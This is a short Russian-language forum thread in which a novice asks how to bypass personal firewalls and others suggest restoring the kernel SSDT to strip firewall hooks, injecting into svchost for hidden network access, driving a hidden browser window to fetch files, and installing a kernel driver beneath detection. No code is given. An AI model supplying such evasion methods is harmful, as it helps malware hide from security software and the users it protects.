Меня интересует какие есть методы их обхода. После долгого времени гуглирования и просмотра васма я понял такое: 1. если делать обход через инжект - надо восстанавливать таблицу Sdt 2. если просто создавать соединения, надо снимать хуки с ядерных функций, которые поставил фаервол мои рассуждения верны? как восстановить Sdt я более-менее нашел инфу и исходники. сижу разбираюсь. а вот как снять хуки не совсем понял. Sdt - это ж таблица адрессов функций ядра, так? если ее восстановить, то сразу же снимуться и хуки? P.s.: извините, если вопрос нелепый, я новичек в этой сфере кодинга
Да. Чистим sdt - инжект не палится, инжектируемся в проц, которому есть доступ в инет(svchost) и там уже создавай любое соединение.
80 порт может вроде любая прога юзать(если я не ошибаюсь.). Или искать окно фаера и нажимать там кнопку "Разрешить". Но инжектом мы убиваем сразу 2 зайцев: невидимость в диспечере задач + обход фаеров.
80 порт может юзать только та прога, которой это можно у него нету оособого статуса. искать окно и нажимать на кнопку - это не то инжект и так будет, но дело в том, что даже тому же svchost.exe не разрешено ко всем портам доступ на исходящие. а те которым разрешено по умолчанию, я юзать не могу (
Смотря какой файер, если оутпост то ето пипец, хотя под его я где то видел сплойт или что то в роде того.
Я както пытался делать вот такую вешь: Запускать осла делать ему невидимое окно. После этого управлять этим окном. Типа передача строки. потом скачевание и сохранение файла. Но облом в том что фаер может начать возмущаться что типа запускается скрытый процес.
Hа невидимое окно многие фаеры ругаются =) Да и запуск ИЕ, левой прогой, тоже не айс, попробуй переместить окно за экран. Самый лучший в этом отношении ZoneAlarm, я не нашёл ещё более-менее простой способ его обхода =\ может конечно плохо искал...
Самый действенный способ - ставь свой драйвер уровня ядра. который быдет сидеть сразу над сетевым драйвером. И тогда хрен кто пропалит. Но его хрен напишишь